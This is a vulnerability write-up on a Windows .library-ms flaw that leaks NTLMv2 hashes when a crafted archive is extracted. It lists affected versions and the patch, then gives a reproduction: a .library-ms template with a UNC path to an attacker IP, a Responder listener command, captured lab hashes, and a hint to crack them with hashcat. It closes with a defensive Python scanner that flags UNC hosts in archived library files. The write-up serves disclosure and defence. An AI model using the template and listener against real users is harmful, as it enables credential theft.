Affected versions

  • Windows 10 Version 1809 for x64-based Systems
  • Windows 10 Version 1809 for 32-bit Systems
  • Windows Server 2025 (Server Core installation)
  • Windows Server 2025
  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2016
  • Windows 10 Version 1607 for x64-based Systems
  • Windows 10 Version 1607 for 32-bit Systems
  • Windows 10 for x64-based Systems
  • Windows 10 for 32-bit Systems
  • Windows 11 Version 24H2 for x64-based Systems
  • Windows 11 Version 24H2 for ARM64-based Systems
  • Windows Server 2022, 23H2 Edition (Server Core installation)
  • Windows 11 Version 23H2 for x64-based Systems
  • Windows 11 Version 23H2 for ARM64-based Systems
  • Windows 10 Version 22H2 for 32-bit Systems
  • Windows 10 Version 22H2 for ARM64-based Systems
  • Windows 10 Version 22H2 for x64-based Systems
  • Windows 11 Version 22H2 for x64-based Systems
  • Windows 11 Version 22H2 for ARM64-based Systems
  • Windows 10 Version 21H2 for x64-based Systems
  • Windows 10 Version 21H2 for ARM64-based Systems
  • Windows 10 Version 21H2 for 32-bit Systems
  • Windows Server 2022 (Server Core installation)
  • Windows Server 2022
  • Windows Server 2019 (Server Core installation)
  • Windows Server 2019

Patch information

KB5053606

Exploitation overview

An attacker crafts a .library-ms file containing a malicious SMB path and lures the victim into extracting it. During extraction, Windows Explorer automatically parses the contents of the .library-ms file for preview and indexing, resolves the SMB path inside it, and triggers an NTLM authentication handshake with the destination path. This leaks the victim's NTLMv2 hash, which the attacker can then use for further attacks.

SMB

SMB (Server Message Block) is a network protocol for file sharing, printer sharing and inter-process communication over a computer network.

The standard Windows form of a share location is a UNC path:
\\<server name or IP address>\<share name>\<directory or file>

When Windows reads from a path over SMB, it sends an NTLM authentication handshake.

.library-ms

.library-ms is a special configuration file that Windows uses to manage "Libraries". Introduced in Windows 7, it aggregates files scattered across different locations (documents, pictures, music, etc.) so they can be accessed quickly. It is essentially an XML file and can be viewed and edited with a text editor such as Notepad. Below is the example content of a Documents library:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/2009/08/StorageService/Library">
<name>文档</name>
<version>1.0</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1002</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<simpleLocation>
<url>shell:::{A8CDFF1C-4878-43BE-B5FD-F8091C1C60D0}</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

  • <name>: the library's display name (e.g. "文档", Documents).
  • <iconReference>: where the library's icon comes from (e.g. an icon index in a system DLL).
  • <url>: the folder location the library points at (this is the key element for the exploit).
  • <isDefaultSaveLocation>: whether this location is the default save location.

Attempting to reproduce

First we need a library-ms template; the url element holds the target IP address:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\ip_address\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Then give it a name; the name is arbitrary, e.g. hacked.library-ms. After writing the attacking machine's IP address into the file, compress it into an archive.

Next, we start listening on the Kali machine:

responder -I eth0 -v

Then extract the archive on the victim; at this point the attacking machine already shows activity:

[SMB] NTLMv2-SSP Client   : 192.168.80.134
[SMB] NTLMv2-SSP Username : DESKTOP-D4RBES3\yu3
[SMB] NTLMv2-SSP Hash : yu3::DESKTOP-D4RBES3:128ca242d7dd87d0:626246E5FBB74C638625A07E8400ADFE:
[SMB] NTLMv2-SSP Client : 192.168.80.134
[SMB] NTLMv2-SSP Username : DESKTOP-D4RBES3\yu3
[SMB] NTLMv2-SSP Hash : yu3::DESKTOP-D4RBES3:f8740cfcfde85a8b:63A96B39B46CFBF239190987CE57680C:01010000000000000007A5D7EE9BDB0138AE6847214CF01200000000xxxxxxxxxx004D004B0001001E00570049004E002D0055004F004F0044004E004E00580057004F004100470004003400570049004E002D0055004F004F0044004E004E00580057004F00410047002E00590042004D004B002E004C004F00430041004C0003001400590042004D004B002E004C004F00430041004C0005001400590042004D004B002E004C004F00430041004C00070008000007A5D7EE9BDB010600040002000000080030003000000000000000010000000020000001DA428B46F65565222FC18C404D73517EDBC06783D5A5A4D0900D3599E667450A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00380030002E00310032003800000000000000000000000000

The captured hash can then be fed to hashcat to crack the password.
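Because the trigger is simply a UNC path in the <url> element of a .library-ms file delivered inside an archive, the same structure described above can be checked from the defending side before anything is extracted. The following Python script is an added example, not code from the original post: it parses the .library-ms XML (matching on local element names, so both the namespace in the Documents example and the one in the reproduction template are handled), extracts the host from any UNC <url>, and inspects a .zip archive in memory without extracting it. The sample archive, the file names and the 192.0.2.10 address are constructed for the example; the allow-list of trusted file servers is an assumed parameter.

```python
"""Scan .library-ms files (loose or inside a .zip) for UNC locations.

Added example, not from the original post. A .library-ms file is XML whose
<url> element under <simpleLocation> names the folder the library points at.
A UNC path (\\host\share) there means Explorer will contact that host when
the library is rendered, so flagging such entries before a user extracts an
archive is a cheap detective control.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Matches a UNC path and captures the host portion of \\host\share\...
UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")


def library_ms_urls(xml_bytes: bytes) -> list[str]:
    """Return the text of every <url> element in a .library-ms document.

    Namespace-agnostic: the element's local name is compared, so documents
    using http://schemas.microsoft.com/windows/2009/library or any other
    namespace are handled the same way.
    """
    root = ET.fromstring(xml_bytes)
    urls = []
    for el in root.iter():
        local_name = el.tag.rsplit("}", 1)[-1]
        if local_name == "url" and el.text:
            urls.append(el.text.strip())
    return urls


def unc_hosts(xml_bytes: bytes) -> list[str]:
    """Return the host part of every UNC <url> in the document."""
    hosts = []
    for url in library_ms_urls(xml_bytes):
        match = UNC_RE.match(url)
        if match:
            hosts.append(match.group(1))
    return hosts


def scan_zip(data: bytes, allowed_hosts=()) -> list[tuple[str, str]]:
    """Inspect a zip archive (given as bytes) without extracting it.

    Returns (member_name, host) for every .library-ms member whose <url>
    points at a UNC host that is not in allowed_hosts (assumed allow-list
    of trusted internal file servers).
    """
    findings = []
    allowed = {h.lower() for h in allowed_hosts}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            try:
                hosts = unc_hosts(zf.read(info.filename))
            except ET.ParseError:
                # Malformed XML still deserves a look; do not silently skip it.
                findings.append((info.filename, "<unparseable>"))
                continue
            for host in hosts:
                if host.lower() not in allowed:
                    findings.append((info.filename, host))
    return findings


# --- constructed sample data (not from the original post) ------------------
SAMPLE_LIBRARY_MS = rb"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\192.0.2.10\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

BENIGN_LIBRARY_MS = rb"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>shell:::{A8CDFF1C-4878-43BE-B5FD-F8091C1C60D0}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def build_sample_zip() -> bytes:
    """Build an in-memory archive holding one benign and one UNC library file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Documents.library-ms", BENIGN_LIBRARY_MS)
        zf.writestr("invoice.library-ms", SAMPLE_LIBRARY_MS)
        zf.writestr("readme.txt", b"nothing to see here")
    return buf.getvalue()


if __name__ == "__main__":
    for member, host in scan_zip(build_sample_zip(), allowed_hosts=["fileserver.corp.example"]):
        print(f"{member}: UNC location pointing at {host}")
```

The scanner deliberately reads archive members with zf.read rather than extracting them, since on an unpatched host the extraction itself is the trigger; in practice it would run on a mail gateway or download proxy, with the allow-list populated from the organisation's known file servers, and any hit on an unknown or external host treated as an indicator worth alerting on.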